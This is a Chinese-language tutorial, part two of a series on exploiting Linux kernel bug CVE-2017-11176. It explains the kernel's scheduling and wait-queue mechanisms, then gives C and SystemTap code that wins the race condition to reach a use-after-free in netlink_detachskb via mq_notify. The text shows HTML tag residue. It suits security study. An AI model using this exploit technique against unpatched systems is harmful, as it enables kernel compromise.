Linux内核漏洞CVE-2017-11176分析与利用（第二部分）<\/h1>

核心概念：Linux调度子系统<\/h2>

任务状态<\/h3>
task_struct<\/code>中的state<\/code>字段表示任务状态<\/li>
主要状态：

TASK_RUNNING<\/code> (0)：进程正在运行或准备就绪<\/li>
TASK_INTERRUPTIBLE<\/code> (1)：进程可中断的等待状态<\/li>
<\/ul>
<\/li>
状态设置方式：

直接修改state<\/code>字段<\/li>
使用__set_current_state()<\/code>宏<\/li>
<\/ul>
<\/li>
<\/ul>
运行队列(run queue)<\/h3>

每个CPU有自己的运行队列(struct rq<\/code>)<\/li>
包含：

可运行任务列表<\/li>
统计信息(nr_running, nr_switches等)<\/li>
当前运行任务指针(curr)<\/li>
<\/ul>
<\/li>
关键操作：

deactivate_task()<\/code>：将任务移出运行队列<\/li>
activate_task()<\/code>：将任务加入运行队列<\/li>
<\/ul>
<\/li>
<\/ul>
任务阻塞机制<\/h3>
阻塞任务的基本流程：<\/p>

设置任务状态为TASK_INTERRUPTIBLE<\/code><\/li>
调用schedule()<\/code><\/li>
<\/ol>
schedule()<\/code>函数关键行为：<\/p>

检查当前任务状态<\/li>
如果状态非0且无挂起信号，调用deactivate_task()<\/code><\/li>
选择下一个要运行的任务<\/li>
<\/ul>
等待队列<\/h3>

表示阻塞任务的双链表(wait_queue_head_t<\/code>)<\/li>
等待队列元素(wait_queue_t<\/code>)包含：

flags<\/li>
private指针(通常指向task_struct<\/code>)<\/li>
func回调函数(默认为default_wake_function<\/code>)<\/li>
task_list链表节点<\/li>
<\/ul>
<\/li>
<\/ul>
关键操作：<\/p>

DECLARE_WAITQUEUE()<\/code>：创建等待队列元素<\/li>
add_wait_queue()<\/code>：将元素加入等待队列<\/li>
remove_wait_queue()<\/code>：从等待队列移除元素<\/li>
<\/ul>
任务唤醒机制<\/h3>

通过__wake_up()<\/code>函数唤醒任务<\/li>
遍历等待队列，对每个元素调用其func回调<\/li>
默认回调default_wake_function<\/code>会调用try_to_wake_up()<\/code><\/li>
try_to_wake_up()<\/code>关键操作：

调用activate_task()<\/code>将任务加入运行队列<\/li>
设置任务状态为TASK_RUNNING<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
漏洞触发条件实现<\/h2>
漏洞触发三个条件<\/h3>

使netlink_attachskb()<\/code>返回1<\/li>
避免阻塞exp进程<\/li>
第二次fget()<\/code>调用返回NULL<\/li>
<\/ol>
阻塞主线程的优势<\/h3>

延长竞态条件窗口期<\/li>
提供控制点("断点")<\/li>
使攻击更可靠<\/li>
<\/ul>
解除阻塞机制<\/h3>
netlink_attachskb()<\/code>中的阻塞代码：<\/p>
DECLARE_WAITQUEUE(wait, current);
<\/span><\/span>__set_current_state(TASK_INTERRUPTIBLE);
<\/span><\/span>add_wait_queue(&<\/span>nlk-><\/span>wait, &<\/span>wait);
<\/span><\/span>schedule_timeout(*<\/span>timeo);
<\/span><\/span>__set_current_state(TASK_RUNNING);
<\/span><\/span>remove_wait_queue(&<\/span>nlk-><\/span>wait, &<\/span>wait);
<\/span><\/span><\/code><\/pre>唤醒路径选择：<\/p>

netlink_release()<\/code>：文件释放时调用，副作用大<\/li>
netlink_rcv_wake()<\/code>：通过recvmsg调用，流程复杂<\/li>
netlink_setsockopt()<\/code>：通过setsockopt调用，最简单<\/li>
<\/ol>
setsockopt唤醒路径<\/h3>
调用链：<\/p>
SYSCALL_DEFINE5(setsockopt)
  -> netlink_setsockopt()
    -> wake_up_interruptible()
<\/code><\/pre>
条件检查：<\/p>

optlen >= 0<\/code><\/li>
fd是有效套接字<\/li>
LSM允许setsockopt操作<\/li>
level != SOL_SOCKET<\/code><\/li>
level == SOL_NETLINK<\/code><\/li>
optlen >= sizeof(int)<\/code><\/li>
optname == NETLINK_NO_ENOBUFS<\/code><\/li>
val != 0<\/code><\/li>
<\/ol>
多线程实现<\/h3>
使用pthread创建解除阻塞线程：<\/p>
struct<\/span> unblock_thread_arg {
<\/span><\/span>    int<\/span> fd;
<\/span><\/span>    bool<\/span> is_ready;
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>static<\/span> void<\/span>*<\/span> unblock_thread<\/span>(void<\/span> *<\/span>arg) {
<\/span><\/span>    struct<\/span> unblock_thread_arg *<\/span>uta =<\/span> (struct<\/span> unblock_thread_arg*<\/span>) arg;
<\/span><\/span>    int<\/span> val =<\/span> 3535<\/span>;
<\/span><\/span>    uta-><\/span>is_ready =<\/span> true; \/\/ 通知主线程
<\/span><\/span><\/span><\/span>    sleep(5<\/span>); \/\/ 给主线程时间阻塞
<\/span><\/span><\/span><\/span>    _setsockopt(uta-><\/span>fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &<\/span>val, sizeof<\/span>(val));
<\/span><\/span>    return<\/span> NULL;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>主线程使用自旋锁等待线程就绪：<\/p>
while<\/span> (uta.is_ready ==<\/span> false)
<\/span><\/span>    ; \/\/ 自旋等待
<\/span><\/span><\/span><\/code><\/pre>System Tap脚本修改<\/h3>
修改为在netlink_attachskb()<\/code>返回时才删除FDT中的fd：<\/p>
function force_trigger_after:long (arg_sock:long)
{
    struct files_struct *files = current->files;
    struct fdtable *fdt = files_fdtable(files);
    fdt->fd[3] = NULL;
}
<\/code><\/pre>
完整攻击流程<\/h2>


主线程：<\/p>

创建netlink套接字<\/li>
创建解除阻塞线程<\/li>
调用mq_notify()<\/code>触发漏洞路径<\/li>
在netlink_attachskb()<\/code>中阻塞<\/li>
<\/ul>
<\/li>

解除阻塞线程：<\/p>

等待主线程阻塞<\/li>
调用setsockopt()<\/code>唤醒主线程<\/li>
<\/ul>
<\/li>

主线程被唤醒后：<\/p>

netlink_attachskb()<\/code>返回1<\/li>
第二次fget()<\/code>返回NULL（通过STAP脚本修改）<\/li>
进入netlink_detachskb()<\/code>触发UAF<\/li>
<\/ul>
<\/li>
<\/ol>
关键点总结<\/h2>

使用多线程控制竞态条件窗口<\/li>
通过setsockopt()<\/code>的NETLINK_NO_ENOBUFS<\/code>选项唤醒线程<\/li>
使用自旋锁协调线程执行顺序<\/li>
修改STAP脚本在正确时机删除文件描述符<\/li>
阻塞机制延长了漏洞触发窗口，提高利用可靠性<\/li>
<\/ol>